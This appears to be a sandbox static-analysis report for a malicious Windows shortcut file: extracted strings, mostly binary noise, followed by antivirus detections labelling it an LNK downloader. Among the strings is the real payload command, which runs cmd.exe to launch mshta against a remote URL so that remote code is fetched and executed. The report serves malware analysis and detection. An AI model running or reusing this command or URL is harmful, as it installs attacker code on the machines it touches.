Static | ZeroBOX
No static analysis available.
Windows
System32
cmd.exe
aLSZ..
C:\Windows\System32\cmd.exe
desktop-oeff7ic
%SystemRoot%\System32\shell32.dll
2 @W#:q
<R><`
q3O>Z?
8I}ZH %
O}g;:<
d$P70j
UqUquS'
P.32<{Y
?+PPw?
/r5}b,O
-;nr}I
bBNPE)&c
"58-DQ
GHmu&$
SfDVQ<
)v!Y8v
&Lm~ZN
$$|ZAs
FGw<"?/y{F
)gnB}X
KVSts<
,bUiR^S
3-Nm~2
W_RE:`
-_|7@)Nn
grw*>(
O6niCE
:S^*.S
%[,PPw9@rz8n
F$8!fF
wGQoN6`
"b?=3r~t
fESRN#7l
GKHaTv
+Gnt!P
<sL6E&
u^5)Sv
+`J!Lm
\Yq/S{5
!gfc.{
Z=#2onx
lnUJnH
U,~5x&
&(-pd?
TQ.M:F
htjj4%P
`uf8AU
(ah1lg#
:WQrt
@}=G:Y
8=P"=%
$MSq{`
gT=fq*
RD"XvM
hdD]XA
? PuVt
?50Y|l
Cwa?>'
1rOKNMi=
R0!^g=Z
i KLo~
k$jw%FS
wXWaaz
}!Yw;E
UM){^
sIt["L~M`
,u>|%rb
1psYFN
OlX{F|
xb!#RW
}myo,Ey
|yvP?'
UYcv\8(B
voh~/r
8Uoz?p
`nG o
%%9uFq
Oih5dB
MEfX3{Fp
82/lJa
M9kdz'
npeFV?
N[T~s(z
ogd3"0
\ <!vY8s
l>v5v'
(:5"s(?
4"6P/y
%+FZA;
xu ('Q
TBTz%?K
OV)k+F
]YN`Hl
Qm6s#N
Rr?}B(
TXT5H]
w^Ejaw
!AJc0n
8@{A:c
F'J8YiO
>E^:/3<
YA0\ mk
WsIwNV
pfik.!
~Fww3x,
6TI*5>
</P,My8b!
ExZD%V2
/R(Uq*
'Ek,:L
c":'59
||-z'T[
\aQxPOn
o ULVZ
}[`"Zd
Up' L3({Z
C&:0hb
IkXI<B
@^a0iA
sP|_mS
|y;y$$
K`S[O<E)1
7~PXzRB{d
D?\HgQ
eHM`1R&4
#*Q[2z%
52@4jD8
_I|?R
MiJy$n
fQiH+0
BBx&[h
S5m $/{;C
(mBCs:
ZBc`yl
u7T?c9$
+=6pFh
uYuw\"
,e.bKt
<2BmIQS2UV
S,cmrg.
>A:""mXe1
E*!w6c
~C+|_g
.5P>j
1+b:h3
_\ujzoT
KU\H/f+
BKUvDypu
S&k;
*Lh=1*1
V3.41<
g5h)Hx/b5,
Ch 1Dec
N4BDlZ
]rYcvVX
er~1Cy
aI\/=q
8"A}md
zf~Ro}
>6f~mk
A99p[V
")si60
m'xzGT
2X%q#=
fS.%]P
C$&!a|G
Mhr5x{
^~6;U{
VyW\ L
o0D.ll1
# qP(s
PgQ2#F
@3T5<
`#Wqs,
%e~\6y
k+r|pM
B}6@//
Hz`mzhL
;!]Q.X
|jn&!y
:Q'?[NM
X%5K'i
\J_qw$
kmV}Q+
#Qz1(
3P`*J!
4yOOzf
L '|p)
U+g,]||
i?@ek)
xd62Sb
gDpSf'g
a1IXR]
y4Q=!-
S>LdFVs
EY)BNU+
\s:n$=
V$7~Y%V
VaMM7,
WQ@Hec
7o^|O|w
v911e^$q
S46/v}
:dBFO&;
=[u7p;
,<!!F
%{ZGSb
rN5?Q8
A@aQ}0
gAC:Iql
Ljn<omc
Bh8srSD
PCP+C
Y*&K=4
Jg&Vkq
.NY#s.
<cCK*
/V"*<9
(tEg0w'9
KL:Mo(
iD.nfKd04
3?sAH
eDwZkwH
$]'WNC
X]q?g'ra
ALSwO.
c]o*W%f
f PZZ0
s5^@wr
_TXV.\!
%Avl@R`
@Zn;%
>"K}S@
ai/sR`%<0W
8 -mf~
Q[L|O_
Jq&<ML+
+C#yFe
v`?~R
7J@}WI^
Zpj7Qn
hh?%]f
50{W8$
GRpBvP
Z*or!bf
:]n~pc
^!2!c N
,~7r@I
-0ul#]
_.<V*u
!D&U8m
Q"PSS+Hq(]
#v=pr
h}o<Y$OS,
\ms"})
43$3QA
[^Cu(g
Ea]kpG
3v{14k
t_Jrr|
8Qi$\*P\,
uqfy`y.
#_&Ryp
F=?8A|5yS
OP^10~
t #t 2
r~P&0
AhZB}b
vE^/Y9
pG.g^@9
]!iEHj
:[{>{f6
-aqjp<0z
L'2h46
v<se>U
xIEv':
Kp'B"
M-%$_8
2~dA,Y
u(+:yl
/{?*4l
$\M b`FbT
0s2J6J:
WbF?X/
bYBJXix
k82S5o
.x{yY[
6wgi=
=O%0Y2
LwDb(g"
wL,#jC
$=48g[j'!
FY~'N
(1l'dR
RH45QQC
({mHRR&
7.F2AKy?i%3t
\AB]%7
+:- N_MSD
4 #:B1
^s4a?e
gbNcF(
*/ed2Vs
EO*"U[
HqGEvT
EA9:iu
8r7{#@]
-B(81z
RRL][@
2t|o ]
Hu >vD
k?7dL;
@q(QWs
W[W|/a
r%VUVF
V-!OYl
tim-49
:4G;B7/
OM|ez=
`LKw*`
=Pt]TK
wE=`GP
0l0&s2r
XrexfY
<7lM_v
=6Mv]v
o'Z]l%
HrBY.U
m/dD\_'G
E85.'}
Q: ~`7
sH_K!@
uZ!X>]=
Ne^+KB
~>&%pl
3>w3v3
uc&*b\=
-,)qNL
w']\(^
Ui8\)@
PM(K7&1
Nm'&T>S
p[Gi}E
3q0;4-
l\TEU)
6t4vZ!%
4r&n^f:
/8!JP)
op-(WX
s,"Im*
X7SEO|H^]
S2!uq
k[#46?
Windows
System32
1cmd.exe
C:\Windows\system32q/c start /b %SystemRoot%\System32\mshta https://note.onedocshare.com/seZlG2VYJ6l05Yn4tvYj93t9eK3OX72pIMiW95JlhDY=C:\Windows\System32\shell32.dll`
%SystemRoot%\System32\shell32.dll
Consolas
TTFont__
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal LNK.Agent.41324
ALYac Heur.BZC.YAX.Nioc.1.078B6D01
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-LNK.Save.6890a73b
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren Clean
Symantec Clean
ESET-NOD32 LNK/Agent.GX
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Heur.BZC.YAX.Nioc.1.078B6D01
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.078B6D01
Rising Downloader.Mshta/LNK!1.BADA (CLASSIC)
Ad-Aware Heur.BZC.YAX.Nioc.1.078B6D01
Emsisoft Heur.BZC.YAX.Nioc.1.078B6D01 (B)
Comodo Clean
F-Secure Clean
DrWeb LNK.Downloader.207
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Heur.BZC.YAX.Nioc.1.078B6D01
Sophos Troj/DownLnk-X
SentinelOne Static AI - Malicious LNK
GData Heur.BZC.YAX.Nioc.1.078B6D01
Jiangmin Clean
Avira Clean
MAX malware (ai score=82)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Heur.BZC.YAX.Nioc.1.078B6D01
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
AhnLab-V3 LNK/Autorun.Gen
McAfee Clean
TACHYON Clean
VBA32 Trojan.Link.Crafted
Zoner Probably Heur.LNKScript
Tencent Heur:Trojan.Winlnk.Downloader.wya
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
No IRMA results available.